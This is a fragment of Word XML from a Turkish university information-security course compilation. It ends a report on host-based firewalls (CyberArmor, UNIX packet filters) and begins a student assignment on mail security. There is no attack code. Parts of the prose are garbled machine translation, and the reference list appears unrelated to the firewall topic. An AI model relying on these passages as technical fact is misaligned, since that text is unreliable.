        <w:t>ulaşmak için sınırlı bir zaman yatırımı vardı. 5. Güvenlik duvarı yazılımının neden olduğu son kullanıcı makinelerde herhangi bir önemli performans düşüşü gözlemlemedik. Bununla birlikte, bu bölüm yazıldığı sırada, ana bilgisayar tabanlı güvenlik duvarı yazılımını kritik sunucularda dağıtmayı henüz test etmedik. 6. Altıncı gözlemimiz ürün özellikleridir. CyberArmor tarafından sağlanan yerleşik raporlama aracının ilkel olduğunu keşfettik. Grafiksel raporlar için yerleşik bir destek yoktur ve metin raporlamayı kullanarak bilgi bulmak zordur. Örneğin, yerleşik metin raporlama özelliğini kullanarak, bir "alarm" raporu alınabilir. Elektronik tablo biçiminde sunulan bu rapor yalnızca alarm mesajlarını ve olay sayısını listeler. Kaynak IP adresleri, tarih ve saat bilgileri rapora dahil edilmemiştir. Dahası, alarm mesajları biraz şifrelidir. (Örnek CyberArmor Alarm Raporu için bkz. Ek 10-3). CyberArmor, Crystal Reports ile uyumluyken, faydalı raporlar üretmek için Crystal Reports kullanmak, fazladan yazılım ve zaman gerektiri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rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="610C1924" wp14:editId="282D66F3">
            <wp:extent cx="5760720" cy="3240089"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="4119" name="Resim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5760720" cy="3240089"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Sergi 10-3. Örnek Siber Zırh alarm raporu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">UNIX İÇİN Ana bilgisayar güvenlik duvarları?  Ana bilgisayar tabanlı güvenlik duvarları, kişisel güvenlik duvarı yazılımının tarihçesi ve evrimi göz önüne alındığında, genellikle Windows platformlarıyla ilişkilendirilir. Ancak, teoride ana bilgisayar tabanlı systems duvarların UNIX sistemlerinde de uygulanamamalarının (ya da kullanılmamasının) bir nedeni yoktur. Emin olmak için, bazı UNIX paket filtreleri ipchains, iptables ve ipfw dahil olmak üzere zaten var.  16   UNIX platformlarının ticari ana bilgisayar tabanlı güvenlik duvarı ürünlerine yaygın bir şekilde entegre edilmediği göz önüne alındığında, bu yardımcı programlar girişimci bir ana bilgisayar tabanlı güvenlik duvarı dağıtımında çok yararlı olabilir. Ancak, bu tür araçlar genellikle kayda değer iki sınırlamalar vardır. İlk olarak, kişisel fi rewalls aksine, bu yardımcı programları paket fi lters vardır. Dolayısıyla, giden bir ağ bağlantısını, bağlantıyı oluşturan uygulamaya göre değerlendirme kabiliyetine sahip </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>değillerdir. İkinci olarak, yardımcı madde, esas değildir. Böylece, bir kurumsal çözüm olarak, bu araçlar kolaylıkla ölçeklenebilir olmayabilir. Bu tür araçlarda ajan tabanlı bir mimarinin olmayışı, UNIX sistemlerinde tespit edilen olaylar hakkında merkezi raporlama yapılmasını zorlaştırabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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SONUÇLAR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Ana bilgisayar tabanlı güvenlik duvarları geleneksel olarak kurumsal dizüstü bilgisayarları ve özel mülkiyete sahip bilgisayarları korumanın bir yolu olarak düşünülse de, ana bilgisayar tabanlı güvenlik duvarları ayrıca sunucular için değerli bir ek koruma katmanı sağlayabilir. Benzer şekilde, ana bilgisayar tabanlı ağ duvarları tipik olarak Windows platformlarıyla ilişkilendirilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D77EA6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77EA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>KAYNAKLAR:</w:t>
      </w:r>
      <w:r w:rsidRPr="00840533">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(REFERENCES)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="AralkYok"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Garip, M. ve Kılıç, B., (2007). İstanbul için sürdürülebilir şehir aydınlatma politikası, IV. Ulusal Aydınlatma Sempozyumu ve Sergisi Bildirileri, 1-6. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="AralkYok"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. İşler, T., (2009). Enerji kalitesi ve sürekliliği için OG dağıtım sistemlerinin yönetimi-1, EMO Dergisi, Nisan, 32-34. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="AralkYok"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Bayındır, R., Demirbaş, Ş., Bektaş, A. ve Çolak, I., (2008). Bir endüstriyel işletmede elektrik enerjisinin izlenmesi, Erciyes Üniversitesi Fen Bilimleri Enstitüsü Dergisi, 24(1-2), 154-164. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D77EA6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="AralkYok"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>4. Çalışkan, N.O., (2007). Elektrik dağıtım sisteminin bilgisayarla programlanması ve otomasyon, Gazi Üniversitesi Fen Bilimleri Enstitüsü, Yüksek Lisans Tezi.</w:t>
      </w:r>
    </w:p>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p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22830E29" wp14:editId="18C30A65">
            <wp:extent cx="1796903" cy="1446028"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="4120" name="Resim 4120" descr="C:\Users\emreaydi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reaydin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\imag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95462" cy="1444868"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>T.C.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>ATATÜRK ÜNİVERSİTESİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Mühendislik Fakültesi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Bilgisayar Mühendisliği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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DERSİN ADI</w:t>
      </w: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sidRPr="00846446">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>BMS.302</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00846446">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Bilgisayar-Bilgi Güvenliği ve Yönetimi</w:t>
      </w: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Section: 2.3.2-2.3.3</w:t>
      </w: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ÖDEV KONUSU</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                  Mail Güvenliği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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Öğrencinin Adı</w:t>
      </w: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Fikret Öztürk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>160757005</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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Dersin Öğretim Görevlisi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Prof. Dr. Abdulsamet HAŞILOĞLU</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Pr="00E332D5" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E332D5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                        İÇİNDEKİLER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Mail Nedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F707BA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F707BA">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>E-Posta Trafiği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0047640A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Posta Hizmetleri Çeşitleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0047640A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Mail Gönderme</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Send Mail)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0047640A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Posta Tanımı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00722DC6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Mail Ağ Mimarisi</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00722DC6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Kötü E-Posta Senaryosu</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00722DC6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Protokoller</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00722DC6">
        <w:t>Çok Amaçlı İnternet Posta Uzantıları(MIME)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00722DC6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>İnternet  İleti  Erişim Protokolü(IMAP)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Pop(Post Office Protokol):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005550D1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>SMTP</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005550D1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>DNS (Domain Name Sistem) Alan Adı Sistemi</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005550D1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>İnternet Metin Mesajlarının Arpa Standardında Formatı</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005550D1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Güvenli Posta Gönderimi</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Kaynakça</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
      </w:pP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r>
        <w:t>1.Mail Nedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00C41A29" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00C41A29">
        <w:t>Telgraf mesajı bittiğinde Elektronik haberleşme başladı</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hAnsi="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="24"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A29">
